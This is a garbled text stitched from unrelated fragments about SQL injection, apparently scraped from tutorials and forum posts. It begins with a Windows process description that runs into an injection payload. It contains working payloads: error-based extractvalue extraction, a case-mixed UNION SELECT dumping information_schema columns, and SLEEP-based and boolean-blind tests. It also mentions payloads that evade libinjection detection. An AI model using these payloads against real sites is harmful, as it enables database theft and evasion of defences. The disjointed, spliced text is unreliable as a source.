Description of Windows process: PsnLite.exePROCEDURE/**/ANALYSE(EXTRACTVALUE(8971,CONCAT(0x5c,0x4a357975,(SELECT/**/(ELT(2836=2836,1
www.vuln-web.com/index.php?view=-35" and extractvalue(0x0a,concat(0x0a,(select database())))-- Output: XPATH syntax error: ' database_name_here'. As we got the database, let us continue :D. Getting tables in the current database
As you can see, this request took 5 seconds, so SLEEP(5) succeeded. Here are the payloads from sqlmap which are currently not considered sqli by libinjection. They seem to gather around RLIKE, JSON_KEYS(), PROCEDURE ANALYSE(EXTRACTVALUE()) and EXP(~()).
As can be seen, there is an XPATH syntax error message. The extractvalue() function itself is a function for extracting (retrieving data) from a string in XML format, using XPATH notation for the query.
In the function procedure analyse() I found this crash while passing a sub query.
Is this a feature of MariaDB? Can I bypass this, or is it impossible to use select in procedure analyse in MariaDB server?
Prepending a full stop or a colon (we use the hex representation of 0x3a below) to the beginning of the XML query will ensure the parsing will always fail, thus generating an error with our extracted data.
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]. There is a different way to discover this data on every different database, but it's always the same methodology.
Analysing the requests. With these requests, we observe that a boolean-blind injection seems to have worked.